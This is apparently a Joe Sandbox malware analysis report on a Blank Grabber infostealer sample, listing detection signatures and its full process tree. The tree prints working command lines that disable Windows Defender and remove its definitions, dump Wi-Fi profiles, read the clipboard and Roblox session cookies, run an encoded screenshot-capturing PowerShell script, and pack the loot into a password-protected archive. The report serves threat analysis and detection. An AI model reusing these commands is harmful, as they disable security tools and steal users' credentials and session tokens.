Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
e45AiBoV6X.exe

Overview

General Information

Sample name:e45AiBoV6X.exe
renamed because original name is a hash value
Original sample name:3e6d7972822636f67ccf275ebd140188.exe
Analysis ID:1477272
MD5:3e6d7972822636f67ccf275ebd140188
SHA1:b0a6df78dad3b697458d9296df134900b4b33177
SHA256:483a8ed2f54ab848a850e9b97207c3ed638ddd3e9fb01d19746f5d5b12e30525
Tags:64exe
Infos:

Detection

Blank Grabber
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Yara detected Blank Grabber
Yara detected Telegram RAT
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Modifies existing user documents (likely ransomware behavior)
Potentially malicious time measurement code found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Removes signatures from Windows Defender
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Sigma detected: Rar Usage with Password and Compression Level
Sigma detected: Rare Remote Thread Creation By Uncommon Source Image
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Suspicious powershell command line found
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Writes or reads registry keys via WMI
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Execution of Powershell with Base64
Too many similar processes found
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • e45AiBoV6X.exe (PID: 7380 cmdline: "C:\Users\user\Desktop\e45AiBoV6X.exe" MD5: 3E6D7972822636F67CCF275EBD140188)
    • e45AiBoV6X.exe (PID: 7396 cmdline: "C:\Users\user\Desktop\e45AiBoV6X.exe" MD5: 3E6D7972822636F67CCF275EBD140188)
      • cmd.exe (PID: 7452 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7568 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7460 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 7544 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
        • MpCmdRun.exe (PID: 7276 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
      • cmd.exe (PID: 7744 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7912 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7772 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 7900 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6628 cmdline: WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8008 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 6692 cmdline: powershell Get-Clipboard MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 8036 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tasklist.exe (PID: 2504 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
      • cmd.exe (PID: 8052 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8164 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6556 cmdline: C:\Windows\system32\cmd.exe /c "netsh wlan show profile" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • netsh.exe (PID: 7484 cmdline: netsh wlan show profile MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 5052 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /c "systeminfo" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7980 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • systeminfo.exe (PID: 7780 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
      • cmd.exe (PID: 7860 cmdline: C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 1368 cmdline: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA= MD5: 04029E121A0CFA5991749937DD22A1D9)
          • csc.exe (PID: 5052 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bohkan2x\bohkan2x.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • cvtres.exe (PID: 6688 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA594.tmp" "c:\Users\user\AppData\Local\Temp\bohkan2x\CSC24344491B9A34B60B194FE692FA1E0E5.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
      • cmd.exe (PID: 8096 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8032 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7976 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • getmac.exe (PID: 2920 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)
      • cmd.exe (PID: 7864 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8144 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 2696 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 824 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 8124 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 8184 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • tree.com (PID: 7724 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)
      • cmd.exe (PID: 7640 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 4500 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7888 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • powershell.exe (PID: 5568 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)
      • cmd.exe (PID: 7188 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • rar.exe (PID: 8132 cmdline: C:\Users\user\AppData\Local\Temp\_MEI73802\rar.exe a -r -hp"slw" "C:\Users\user\AppData\Local\Temp\ZEPXL.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)
      • cmd.exe (PID: 6688 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7780 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 8088 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1816 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 7756 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • cmd.exe (PID: 7900 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 3052 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
